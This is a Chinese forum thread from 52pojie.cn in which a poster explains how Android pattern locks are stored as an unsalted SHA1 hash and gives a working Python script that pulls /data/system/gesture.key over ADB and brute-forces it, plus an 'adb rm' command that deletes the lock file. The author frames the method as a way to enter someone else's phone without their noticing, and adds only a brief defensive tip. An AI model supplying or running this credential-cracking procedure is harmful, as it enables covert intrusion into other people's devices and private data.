吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 172806|回复: 68
收起左侧

[Android 分享] 如何破解安卓手机上的图形锁(九宫格锁)

  [复制链接]
K_Yond 发表于 2015-11-13 20:24
安卓手机的图形锁(九宫格)是3×3的点阵,按次序连接数个点从而达到锁定/解锁的功能。最少需要连接4个点,最多能连接9个点。网上也有暴力删除手机图形锁的方法,即直接干掉图形锁功能。但假如你想进入别人的手机,但又不想引起其警觉的话……你可以参考一下本文。
前提条件:手机需要root,而且打开调试模式。一般来讲,如果用过诸如“豌豆荚手机助手”、“360手机助手”一类的软件,都会被要求打开调试模式的。如果要删除手机内置软件,则需要将手机root。
原理分析
首先科普一下,安卓手机是如何标记这9个点的。通过阅读安卓系统源码可知,每个点都有其编号,组成了一个3×3的矩阵,形如:
00 01 0203 04 0506 07 08
假如设定解锁图形为一个“L”形,如图:
L.jpg
那么这几个点的排列顺序是这样的:00 03 06 07 08。系统就记下来了这一串数字,然后将这一串数字(以十六进制的方式)进行SHA1加密,存储在了手机里的/data/system/gesture.key 文件中。我们用数据线连接手机和电脑,然后ADB连接手机,将文件下载到电脑上(命令:adb pull /data/system/gesture.key gesture.key),如图:
L.jpg
用WinHex等十六进制编辑程序打开gesture.key,会发现文件内是SHA1加密过的字符串:c8c0b24a15dc8bbfd411427973574695230458f0,如图:
L.jpg

当你下次解锁的时候,系统就对比你画的图案,看对应的数字串是不是0003060708对应的加密结果。如果是,就解锁;不是就继续保持锁定。那么,如果穷举所有的数字串排列,会有多少呢?联想到高中的阶乘,如果用4个点做解锁图形的话,就是9x8x7x6=3024种可能性,那5个点就是15120,6个点的话60480,7个点181440,8个点362880,9个点362880。总共是985824种可能性(但这么计算并不严密,因为同一条直线上的点只能和他们相邻的点相连)。

满打满算,也不到985824种可能性。乍一看很大,但在计算机面前,穷举出来这些东西用不了几秒钟。

破解过程

知道了原理,就着手写程序来实现吧。这里使用了Python来完成任务。主要应用了hashlib模块(对字符串进行SHA1加密)和itertools模块(Python内置,生成00-09的排列组合)。

主要流程为:

1.ADB连接手机,获取gesture.key文件
2.读取key文件,存入字符串str_A
3.生成全部可能的数字串
4.对这些数字串进行加密,得到字符串str_B
5.将字符串str_A与str_B进行对比
6.如果字符串A,B相同,则说明数字串num就是想要的解锁顺序
7.打印出数字串num

下面为程序:

# -*- coding: cp936 -*-import itertoolsimport hashlibimport timeimport os#调用cmd,ADB连接到手机,读取SHA1加密后的字符串os.system("adb pull /data/system/gesture.key gesture.key")time.sleep(5)f=open('gesture.key','r')pswd=f.readline()f.close()pswd_hex=pswd.encode('hex')print '加密后的密码为:%s'%pswd_hex#生成解锁序列,得到['00','01','02','03','04','05','06','07','08']matrix=[] for i in range(0,9):    str_temp = '0'+str(i)    matrix.append(str_temp)#将00——08的字符进行排列,至少取4个数排列,最多全部进行排列min_num=4max_num=len(matrix)for num in range(min_num,max_num+1):#从04 -> 08    iter1 = itertools.permutations(matrix,num)#从9个数字中挑出n个进行排列    list_m=[]    list_m.append(list(iter1))#将生成的排列全部存放到 list_m 列表中    for el in list_m[0]:#遍历这n个数字的全部排列        strlist=''.join(el)#将list转换成str。[00,03,06,07,08]-->0003060708        strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#将字符串进行SHA1加密        if pswd_hex==strlist_sha1:#将手机文件里的字符串与加密字符串进行对比            print '解锁密码为:',strlist

总结

从程序本身来说,得到解锁密码后应该用break跳出循环并终止程序运行。但Python并没有跳出多重循环的语句,如果要跳出多重循环,只能设置标志位然后不停进行判定。为了运行速度就略去了“跳出循环”这个步骤。(有没有更好的实现跳出多重循环的方法?)另外也略去了很多容错语句。从破解目的来说,如果单单是忘记了自己的手机图形锁密码,完全可以用更简单的办法:ADB连接手机,然后“adb rm /data/system/gesture.key”删除掉gesture.key文件,此时图形锁就失效了,随意画一下就能解锁。但本文开篇假设的是“为了不被察觉地进入到别人的手机里”,所以就有了这篇文章。

最后提一个安全小建议:如果手机已root,还要用“XX手机助手”,还想设置图形锁的话——在手机“设置”选项里,有一个“锁定状态下取消USB调试模式”(这个名字因手机而异,而且有的有此选项,有的手机就没有),开启此功能之后,在手机锁定状态下就能够防范此类攻击了。此文技术原理很简单,还望各位大大传授些高大上的Python编程技巧。


免费评分

参与人数 9吾爱币 +2 热心值 +9 收起 理由
alwayssmile + 1 + 1 我很赞同!
little3388 + 1 + 1 我很赞同!
630216608 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
Tiangyi + 1 热心回复!
【=筱筱=】 + 1 鼓励转贴优秀软件安全工具和文档!
三星要倒闭了 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
gaole495963649 + 1 热心回复!
Niuer + 1 我很赞同!
青年的故事 + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

SQLite 发表于 2016-8-2 14:41 来自手机
小木曾雪菜 发表于 2016-8-1 23:43
这不就是最简单的枚举吗?这样应该效率比较低吧,随机生成全排列有很多无效解呀
搜索解空间最好剪枝和并 ...

很惭愧,Python代码是我写的,您说的“剪枝”是用了决策树吗?具体的剪枝应当如何操作?
gwdai 发表于 2016-8-1 21:06 来自手机
我觉得吧  这没什么意义   你都不知道密码  都进不去还怎么去设置呢?  还要root    更不可能……
染红的枫叶 发表于 2015-11-13 20:37
头像被屏蔽
嘉文 发表于 2015-11-13 20:49
提示: 作者被禁止或删除 内容自动屏蔽
1648496289 发表于 2015-11-13 20:56
我这个小白看不懂
aqq 发表于 2015-11-13 21:00 来自手机
原来我还只懂三清,现在长见识了
za766 发表于 2015-11-13 21:04
没什么卵用 直接刷级完事
贝壳de幻想 发表于 2015-11-13 21:09
蛮不错的支持一下
闻闻 发表于 2015-11-13 21:18
这个思路很不错   支持一下
木木头上 发表于 2015-11-13 21:22
表示不用9宫锁,用的系统的10位中英文密码
zxzxaas 发表于 2015-11-13 21:32
这个好高深,学习了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 16:53

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表